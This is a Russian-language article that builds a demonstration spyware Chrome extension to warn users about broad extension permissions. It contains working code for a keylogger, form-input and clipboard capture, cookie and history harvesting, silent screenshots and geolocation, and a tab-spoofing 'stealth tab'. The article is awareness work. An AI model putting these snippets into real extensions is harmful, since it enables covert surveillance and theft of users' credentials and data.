<div id="post-content-body">
 <div>
  <div class="article-formatted-body article-formatted-body article-formatted-body_version-1">
   <div xmlns="http://www.w3.org/1999/xhtml">
    <div style="text-align:center;">
     <img data-blurred="true" data-src="https://habrastorage.org/webt/5x/rc/ca/5xrcca8hit9ckxy_l-xijlfusve.jpeg" src="https://habrastorage.org/r/w780q1/webt/5x/rc/ca/5xrcca8hit9ckxy_l-xijlfusve.jpeg"/>
    </div>
    <br/>
    Пусть Manifest v3 и ограничил возможности браузерных расширений, но я считаю, что они далеко не исчерпаны. Чтобы доказать это, создадим расширение Chrome, крадущее максимально возможное количество данных.
    <br/>
    <br/>
    Мы добьёмся двух целей:
    <br/>
    <br/>
    <ul>
     <li>
      Исследуем грани возможного для расширений Chrome
     </li>
     <li>
      Продемонстрируем, что вы подвержены опасности, если не будете аккуратны с тем, что устанавливаете.
     </li>
    </ul>
    <br/>
    <em>
     Примечание: на самом деле реализация этого расширения — злодейство. Вам не следует использовать в злонамеренных целях полномочия расширений, красть пользовательские данные и создавать зловредные браузерные расширения. Любые реализации, производные расширения или применение этих техник без разрешения Национальной баскетбольной ассоциации не рекомендуются.
    </em>
    <br/>
    <a name="habracut">
    </a>
    <br/>
    <h1>
     Основные правила
    </h1>
    <br/>
    <ul>
     <li>
      Пользователь не должен подозревать, что за кулисами что-то происходит.
     </li>
     <li>
      Не должно быть никаких визуальных признаков происходящего.
      <ul>
       <li>
        Никаких лишних сообщений, предупреждений или ошибок в консоли.
       </li>
       <li>
        Никаких дополнительных браузерных предупреждений или диалоговых окон с запросом разрешений.
       </li>
       <li>
        Никакого лишнего сетевого трафика на уровне страницы.
       </li>
      </ul>
     </li>
     <li>
      Как только пользователь даст разрешение в ответ на запрос
      <em>
       широких
      </em>
      полномочий, он должен забыть о правах доступа расширения.
     </li>
    </ul>
    <br/>
    <h1>
     Краткое введение в расширения Chrome
    </h1>
    <br/>
    Существует три компонента, которые важны для нашего злодейского расширения:
    <br/>
    <br/>
    <strong>
     Background Service Worker (воркер фонового сервиса)
    </strong>
    <br/>
    <br/>
    <ul>
     <li>
      Управляется событиями. Может использоваться как «сохраняемый» контейнер для выполнения JavaScript
     </li>
     <li>
      Может получать доступ ко всем* WebExtensions API
     </li>
     <li>
      Не может получать доступ к DOM API
     </li>
     <li>
      Не может напрямую получать доступ к страницам
     </li>
    </ul>
    <br/>
    <strong>
     Всплывающая страница
    </strong>
    <br/>
    <br/>
    <ul>
     <li>
      Открывается только после действий пользователя
     </li>
     <li>
      Может получать доступ ко всем* WebExtensions API
     </li>
     <li>
      Может получать доступ к DOM API
     </li>
     <li>
      Не может напрямую получать доступ к страницам
     </li>
    </ul>
    <br/>
    <strong>
     Content Script (скрипт контента)
    </strong>
    <br/>
    <br/>
    <ul>
     <li>
      Имеет прямой и полный доступ ко всем страницам и DOM
     </li>
     <li>
      Может выполнять JavaScript на странице, однако в среде песочницы
     </li>
     <li>
      Может использовать только подмножество WebExtensions API
     </li>
     <li>
      Имеет те же ограничения, что и страница (CORS и так далее)
     </li>
    </ul>
    <br/>
    <em>
     *Присутствуют незначительные ограничения
    </em>
    <br/>
    <br/>
    <h1>
     Получаем глобальные разрешения
    </h1>
    <br/>
    Просто для развлечения наше зловредное расширение будет запрашивать
    <em>
     все
    </em>
    возможные разрешения. На странице
    <a href="https://developer.chrome.com/docs/extensions/mv3/declare_permissions/" rel="nofollow noopener noreferrer">
     https://developer.chrome.com/docs/extensions/mv3/declare_permissions/
    </a>
    есть список разрешений расширений Chrome, и мы воспользуемся многими из них.
    <br/>
    <br/>
    Убрав все разрешения, которые не поддерживает Chrome, мы получим следующее:
    <br/>
    <br/>
    <pre><code class="json">{
  ...
  "host_permissions": ["&lt;all_urls&gt;"],
  "permissions": [
    "activeTab",
    "alarms",
    "background",
    "bookmarks",
    "browsingData",
    "clipboardRead",
    "clipboardWrite",
    "contentSettings",
    "contextMenus",
    "cookies",
    "debugger",
    "declarativeContent",
    "declarativeNetRequest",
    "declarativeNetRequestWithHostAccess",
    "declarativeNetRequestFeedback",
    "desktopCapture",
    "downloads",
    "fontSettings",
    "gcm",
    "geolocation",
    "history",
    "identity",
    "idle",
    "management",
    "nativeMessaging",
    "notifications",
    "pageCapture",
    "power",
    "printerProvider",
    "privacy",
    "proxy",
    "scripting",
    "search",
    "sessions",
    "storage",
    "system.cpu",
    "system.display",
    "system.memory",
    "system.storage",
    "tabCapture",
    "tabGroups",
    "tabs",
    "tabs",
    "topSites",
    "tts",
    "ttsEngine",
    "unlimitedStorage",
    "webNavigation",
    "webRequest"
  ],
}</code></pre>
    <br/>
    <em>
     manifest.json
    </em>
    <br/>
    <br/>
    Большинство из этих разрешений не потребуется, но кого это волнует? Давайте взглянем, как будет выглядеть окно предупреждения:
    <br/>
    <br/>
    <div style="text-align:center;">
     <img data-src="https://habrastorage.org/webt/l3/sj/fk/l3sjfkicaatnemozd8ixpig6try.png" src="https://habrastorage.org/r/w1560/webt/l3/sj/fk/l3sjfkicaatnemozd8ixpig6try.png"/>
    </div>
    <br/>
    Chrome скроллит контейнер окна предупреждения о запросе разрешений, поэтому больше половины предупреждений даже не отображается. Я думаю, что большинство пользователей даже не задумается, стоит ли устанавливать приложение, которое, похоже, запрашивает всего пять разрешений.
    <br/>
    <br/>
    <strong>
     Полный
    </strong>
    список предупреждения о разрешениях выглядит так:
    <br/>
    <br/>
    <ul>
     <li>
      То, что мы видим в диалоговом окне:
      <br/>
      <br/>
      <ul>
       <li>
        Доступ к бэкенду отладчика страниц
       </li>
       <li>
        Считывание и изменение всех данных пользователя на веб-сайтах
       </li>
       <li>
        Определение физического местоположения
       </li>
       <li>
        Считывание и изменение истории просмотров на всех устройствах, где выполнен вход
       </li>
       <li>
        Отображение уведомлений
       </li>
      </ul>
     </li>
     <li>
      То, что скрыто:
      <br/>
      <br/>
      <ul>
       <li>
        Считывание и изменение закладок
       </li>
       <li>
        Считывание и изменение копируемых и вставляемых данных
       </li>
       <li>
        Захват содержимого экрана
       </li>
       <li>
        Управление загрузками
       </li>
       <li>
        Определение и извлечение накопителей
       </li>
       <li>
        Изменение параметров доступа веб-сайтов к таким функциям, как куки, JavaScript, плагины, геолокация, микрофон, камера и так далее
       </li>
       <li>
        Управление приложениями, расширениями и темами
       </li>
       <li>
        Обмен данными с взаимодействующими нативными приложениями
       </li>
       <li>
        Изменение параметров, связанных с конфиденциальностью
       </li>
       <li>
        Просмотр групп вкладок и управление ими
       </li>
       <li>
        Считывание всего текста при помощи синтезатора речи
       </li>
      </ul>
     </li>
    </ul>
    <br/>
    Давайте добавим скрипт контента, работающий на всех страницах и фреймах, расширим область действия нашего расширения до окон режима «Инкогнито» и сделаем все ресурсы доступными на случай, если они нам понадобятся:
    <br/>
    <br/>
    <pre><code class="json">{
  ...
  "web_accessible_resources": [
    {
      "resources": ["*"],
      "matches": ["&lt;all_urls&gt;"]
    }
  ],
  "content_scripts": [
    {
      "matches": ["&lt;all_urls&gt;"],
      "all_frames": true,
      "css": [],
      "js": ["content-script.js"],
      "run_at": "document_end"
    }
  ],
  "incognito": "spanning",
}</code></pre>
    <br/>
    <em>
     manifest.json
    </em>
    <br/>
    <br/>
    <h1>
     Фасад расширения
    </h1>
    <br/>
    Наше зловещее расширение будет притворяться приложением для создания заметок:
    <br/>
    <br/>
    <div style="text-align:center;">
     <img data-blurred="true" data-src="https://habrastorage.org/webt/p_/iv/v2/p_ivv2kkpavd1wmbyhdug67xk_s.jpeg" src="https://habrastorage.org/r/w780q1/webt/p_/iv/v2/p_ivv2kkpavd1wmbyhdug67xk_s.jpeg"/>
    </div>
    <br/>
    Благодаря этому страница расширения будет открываться часто, что позволяет нам незаметно выполнять зловредный сбор данных. Также мы используем воркер фонового сервиса.
    <br/>
    <br/>
    <h1>
     Аналитика и извлечение данных
    </h1>
    <br/>
    Жизнь коротка, Интернет быстр, а накопители дёшевы. Любые данные, которые решит собирать наше расширение, могут быть отправлены на контролируемый нами сервер при помощи воркера фонового сервиса, а пользователь даже не догадается об этом. Эти сетевые запросы отобразятся, только если он решит исследовать сетевую активность самого расширения, до которой довольно сложно добраться. Хотите добавить постоянное слежение за пользователем на веб-страницах? Никаких проблем! На сетевой трафик от фоновой страницы не обращают внимания блокировщики рекламы и другие расширения для защиты конфиденциальности пользователей, поэтому ради бога, отслеживайте каждый щелчок и нажатие клавиши. (Внешние менеджеры сетевого трафика и программы наподобие PiHole будут отслеживать это.)
    <br/>
    <br/>
    <h1>
     Очень лёгкая добыча
    </h1>
    <br/>
    WebExtensions API сразу же позволяет собирать нам довольно много информации почти без малейших усилий.
    <br/>
    <br/>
    <h2>
     Куки
    </h2>
    <br/>
    <code>
     chrome.cookies.getAll({})
    </code>
    получает в виде массива все куки браузера.
    <br/>
    <br/>
    <h2>
     История
    </h2>
    <br/>
    <code>
     chrome.history.search({ text: "" })
    </code>
    получает в виде массива всю историю просмотров пользователя.
    <br/>
    <br/>
    <h2>
     Скриншоты
    </h2>
    <br/>
    <code>
     chrome.tabs.captureVisibleTab()
    </code>
    втихомолку делает скриншот того, что в данный момент видит пользователь. Мы можем вызывать эту функцию в любое время при помощи сообщений, отправляемых из скрипта контента, или даже чаще для URL, которые нам кажутся ценными. API возвращает изображение в виде удобных строк данных URL, поэтому очень легко передать его в нашу конечную точку сбора данных. Делают ли браузерные расширения захват вашего экрана прямо сейчас? Вы никогда этого не узнаете!
    <br/>
    <br/>
    <h2>
     Пользовательская навигация
    </h2>
    <br/>
    Можно использовать
    <code>
     webNavigation
    </code>
    API для удобного отслеживания действий пользователя в реальном времени:
    <br/>
    <br/>
    <pre><code class="javascript">chrome.webNavigation.onCompleted.addListener((details) =&gt; {
  // {
  //   "documentId": "F5009EFE5D3C074730E67F5C1D934C0A",
  //   "documentLifecycle": "active",
  //   "frameId": 0,
  //   "frameType": "outermost_frame",
  //   "parentFrameId": -1,
  //   "processId": 139,
  //   "tabId": 174034187,
  //   "timeStamp": 1676958729790.8088,
  //   "url": "https://www.linkedin.com/feed/"
  // }
});</code></pre>
    <br/>
    <em>
     background.js
    </em>
    <br/>
    <br/>
    <h2>
     Трафик страниц
    </h2>
    <br/>
    <code>
     webRequest
    </code>
    API позволяет нам просматривать весь сетевой трафик каждой вкладки, отделять сетевой трафик при помощи
    <code>
     requestBody
    </code>
    и извлекать интересные учётные данные, адреса и так далее:
    <br/>
    <br/>
    <pre><code class="javascript">chrome.webRequest.onBeforeRequest.addListener(
  (details) =&gt; {
    if (details.requestBody) {
      // Захват данных requestBody
    }
  },
  {
    urls: ["&lt;all_urls&gt;"],
  },
  ["requestBody"]
);</code></pre>
    <br/>
    <em>
     background.js
    </em>
    <br/>
    <br/>
    <h1>
     Кейлоггер
    </h1>
    <br/>
    Так как скрипт контента выполняется на каждой странице, считывать нажатия клавиш чертовски легко. Создание буфера нажатия клавиш с периодическим сбросом данных предоставит нам удобную возможность чтения последовательных нажатий клавиш.
    <br/>
    <br/>
    <pre><code class="javascript">let buffer = "";

const debouncedCaptureKeylogBuffer = _.debounce(async () =&gt; {
  if (buffer.length &gt; 0) {
    // Сбрасываем буфер

    buffer = "";
  }
}, 1000);

document.addEventListener("keyup", (e: KeyboardEvent) =&gt; {
  buffer += e.key;

  debouncedCaptureKeylogBuffer();
});</code></pre>
    <br/>
    <em>
     content-script.js
    </em>
    <br/>
    <br/>
    <h1>
     Захват ввода
    </h1>
    <br/>
    Из скрипта контента можно прослушивать события
    <code>
     input
    </code>
    любых элементов с возможностью редактирования и захватывать их значение.
    <br/>
    <br/>
    <pre><code class="javascript">[...document.querySelectorAll("input,textarea,[contenteditable]")].map((input) =&gt;
  input.addEventListener("input", _.debounce((e) =&gt; {
    // Считываем введённое значение
  }, 1000))
);</code></pre>
    <br/>
    <em>
     content-script.js
    </em>
    <br/>
    <br/>
    Если мы ожидаем, что DOM страницы будет часто меняться (например, при помощи SPA), то нам определённо не стоит упускать любые ценные данные. Просто установим
    <code>
     MutationObserver
    </code>
    для наблюдения за целой страницей и при необходимости будем повторно применять слушателей.
    <br/>
    <br/>
    <pre><code class="javascript">const inputs: WeakSet&lt;Element&gt; = new WeakSet();

const debouncedHandler = _.debounce(() =&gt; {
  [...document.querySelectorAll("input,textarea,[contenteditable")]
    .filter((input: Element) =&gt; !inputs.has(input))
    .map((input) =&gt; {
      input.addEventListener(
        "input",
        _.debounce((e) =&gt; {
          // Считываем введённое значение
        }, 1000)
      );

      inputs.add(input);
    });
}, 1000);

const observer = new MutationObserver(() =&gt; debouncedHandler());
observer.observe(document.body, { subtree: true, childList: true });</code></pre>
    <br/>
    <em>
     content-script.js
    </em>
    <br/>
    <br/>
    <h1>
     Захват буфера обмена
    </h1>
    <br/>
    С этим всё чуть сложнее.
    <code>
     navigator.clipboard.read()
    </code>
    и любой другой метод Clipboard API отображает пользователю диалоговое окно с запросом разрешения, так что этот способ нам не подходит.
    <br/>
    <br/>
    <div style="text-align:center;">
     <img data-blurred="true" data-src="https://habrastorage.org/webt/tx/zy/s7/txzys7ewgdlc5v7hdkvuzel5nce.jpeg" src="https://habrastorage.org/r/w780q1/webt/tx/zy/s7/txzys7ewgdlc5v7hdkvuzel5nce.jpeg"/>
    </div>
    <br/>
    Использование
    <code>
     document.execCommand("paste")
    </code>
    для выполнения дампа буфера обмена в скрытое поле ввода работает ненадёжно, поэтому придётся сохранять со страницы выбранный текст.
    <br/>
    <br/>
    <pre><code class="javascript">document.addEventListener("copy", () =&gt; {
  const selected = window.getSelection()?.toString();

  // Захватываем выбранный текст при событиях копирования
});</code></pre>
    <br/>
    <em>
     content-script.js
    </em>
    (Примечание: мне не очень нравится такое решение, но пока его вполне достаточно.)
    <br/>
    <br/>
    <h1>
     Захват геолокации
    </h1>
    <br/>
    Выполнять захват геолокации сложнее всего, это связано с ограничениями Chrome на то, когда и как она может захватываться. Добавление разрешения
    <code>
     geolocation
    </code>
    позволяет нам только захватывать местоположение внутри
    <em>
     страницы расширения
    </em>
    , но не из скриптов контента. Если всплывающее окно открывается достаточно часто, этого может быть достаточно.
    <br/>
    <br/>
    <pre><code class="javascript">navigator.geolocation.getCurrentPosition(
  (position) =&gt; {
    // Захватываем геопозицию
  },
  (e) =&gt; {},
  {
    enableHighAccuracy: true,
    timeout: 5000,
    maximumAge: 0,
  }
);</code></pre>
    <br/>
    <em>
     popup.js
    </em>
    <br/>
    <br/>
    Если нам нужно
    <em>
     больше
    </em>
    данных о геолокации, нужно будет поработать со скриптом контента. Необходимо помешать браузеру генерировать диалоговое окно с запросом разрешения, поэтому сначала мы проверяем, есть ли у страницы уже разрешение на получение геолокации. Если оно есть, мы можем втихомолку запрашивать местоположение.
    <br/>
    <br/>
    <pre><code class="javascript">navigator.permissions
  .query({ name: "geolocation" })
  .then(({ state }: { state: string }) =&gt; {
    if (state === "granted") {
      captureGeolocation();
    }
  });</code></pre>
    <br/>
    <em>
     content-script.js
    </em>
    <br/>
    <br/>
    <h1>
     Вкладка-ниндзя
    </h1>
    <br/>
    Если вы похожи на меня, то у вас открыта целая куча вкладок. Большинство вкладок длительное время простаивает, и Chrome с готовностью демонтирует простаивающие вкладки, чтобы освободить ресурсы системы. Допустим, нам нужно открыть страницу расширения во вкладке так, чтобы этого не заметил пользователь. Допустим, мы хотим выполнить какую-то дополнительную обработку на уровне страниц при помощи WebExtensions API. При открытии и закрытии новой вкладки на панели вкладок будет заметна активность, поэтому это будет слишком подозрительно. Вместо этого давайте используем имеющуюся вкладку, чтобы она
    <em>
     казалась
    </em>
    старой вкладкой. Это может работать следующим образом:
    <br/>
    <br/>
    <ol>
     <li>
      Находим подходящую вкладку, на которую пользователь не обращает внимания.
     </li>
     <li>
      Записываем её URL, URL фавиконки и заголовок.
     </li>
     <li>
      Заменяем эту вкладку страницей расширения и немедленно заменяем фавиконку и заголовок, чтобы она напоминала исходную вкладку.
     </li>
     <li>
      Творим тёмные дела.
     </li>
     <li>
      После завершения работы страницы или когда пользователь открывает вкладку, переходим к исходному URL.
     </li>
    </ol>
    <br/>
    Давайте создадим proof of concept. Вот пример фонового скрипта для открытия вкладки-ниндзя:
    <br/>
    <br/>
    <pre><code class="javascript">export async function openStealthTab() {
  const tabs = await chrome.tabs.query({
    // Не использовать вкладку, которую смотрит пользователь
    active: false,
    // Не использовать закреплённые вкладки, вероятно, их часто используют
    pinned: false,
    // Не использовать вкладку, воспроизводящую звук
    audible: false,
    // Не использовать вкладку, пока она не завершила загрузку
    status: "complete",
  });

  const [eligibleTab] = tabs.filter((tab) =&gt; {
    // Должна иметь url и id
    if (!tab.id || !tab.url) {
      return false;
    }

    // Не использовать страницы расширений
    if (new URL(tab.url).protocol === "chrome-extension:") {
      return false;
    }

    return true;
  });

  if (eligibleTab) {
    // Эти значения будут использоваться для спуфинга текущей страницы
    // и возврата к ней
    const searchParams = new URLSearchParams({
      returnUrl: eligibleTab.url as string,
      faviconUrl: eligibleTab.favIconUrl || "",
      title: eligibleTab.title || "",
    });

    const url = `${chrome.runtime.getURL(
      "stealth-tab.html"
    )}?${searchParams.toString()}`;

    // Открываем вкладку-ниндзя
    await chrome.tabs.update(eligibleTab.id, {
      url,
      active: false,
    });
  }
}</code></pre>
    <br/>
    <em>
     background.js
    </em>
    <br/>
    <br/>
    А вот скрипт вкладки-ниндзя:
    <br/>
    <br/>
    <pre><code class="javascript">const searchParams = new URL(window.location.href).searchParams;

// Выполняем спуфинг внешнего вида предыдущей вкладки страницы
document.title = searchParams.get('title');
document.querySelector(`link[rel="icon"]`)
  .setAttribute("href", searchParams.get('faviconUrl'));

function useReturnUrl() {
  // Пользователь переключился на эту вкладку, бежим!
  window.location.href = searchParams.get('returnUrl');
}

// Проверяем, видима ли эта страница при загрузке
if (document.visibilityState === "visible") {
  useReturnUrl();
}

document.addEventListener("visibilitychange", () =&gt; useReturnUrl());

// А теперь творим тёмные дела

// Закончили с тёмными делами, выполняем возврат!
useReturnUrl();</code></pre>
    <br/>
    <em>
     stealth-tab.js
    </em>
    <br/>
    <br/>
    <div style="text-align:center;">
     <img data-blurred="true" data-src="https://habrastorage.org/webt/5x/rc/ca/5xrcca8hit9ckxy_l-xijlfusve.jpeg" src="https://habrastorage.org/r/w780q1/webt/5x/rc/ca/5xrcca8hit9ckxy_l-xijlfusve.jpeg"/>
    </div>
    <br/>
    Совершенно ничего подозрительного!
    <br/>
    <br/>
    <h1>
     Публикуемся в Chrome Web Store
    </h1>
    <br/>
    Конечно, я шучу. Это расширение с позором выгонят из очереди проверки. Разумеется, это просто карикатура на зловредное расширение, но безумно ли считать, что часть его функциональности можно использовать? При установке расширения Chrome,
    <em>
     кажущегося
    </em>
    надёжным (что бы это ни значило), большинство пользователей игнорирует сообщения с предупреждениями о запросах разрешений, какими страшными бы они ни были. После того, как вы выдали разрешения, ваша судьба находится в руках расширения. Наверно, вы думаете: «Автор, но это точно не про меня! Я опытный пользователь, аккуратный, разборчивый и педантичный. Со мной никто такого не сможет проделать». В таком случае, мой педантичный друг, ответьте-ка на вопросы:
    <br/>
    <br/>
    <ul>
     <li>
      Сможете ли вы не глядя назвать больше половины расширений, которые у тебя сейчас установлены?
     </li>
     <li>
      Кто занимается их поддержкой? Это тот же самый человек или организация, что и были при установке расширения? Вы в этом уверены?
     </li>
     <li>
      Вы
      <em>
       действительно
      </em>
      тщательно изучали их разрешения?
     </li>
    </ul>
    <br/>
    <h1>
     Попробуйте сами, если осмелитесь
    </h1>
    <br/>
    Попробовать Spy Extension можно здесь:
    <a href="https://github.com/msfrisbie/spy-extension" rel="nofollow noopener noreferrer">
     https://github.com/msfrisbie/spy-extension
    </a>
    . Я добавил страницу опций, чтобы вы могли видеть все похищенные данные, которые расширение способно вытянуть из вашего браузера. Я не буду выкладывать скриншот; достаточно сказать, что содержимое страницы
    <em>
     немного
    </em>
    компрометирующее. Никакая собранная информация не покидает пределов браузера. Или покидает? (Нет, не покидает.)
   </div>
  </div>
 </div>
 <!-- -->
 <!-- -->
</div>
